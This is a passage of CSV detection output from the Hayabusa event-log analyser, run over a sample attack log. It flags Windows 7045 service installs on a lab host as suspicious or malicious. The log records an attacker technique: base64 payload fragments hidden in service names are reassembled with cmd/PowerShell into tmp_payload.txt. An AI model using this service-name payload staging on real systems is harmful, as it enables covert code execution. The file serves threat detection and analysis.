Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 
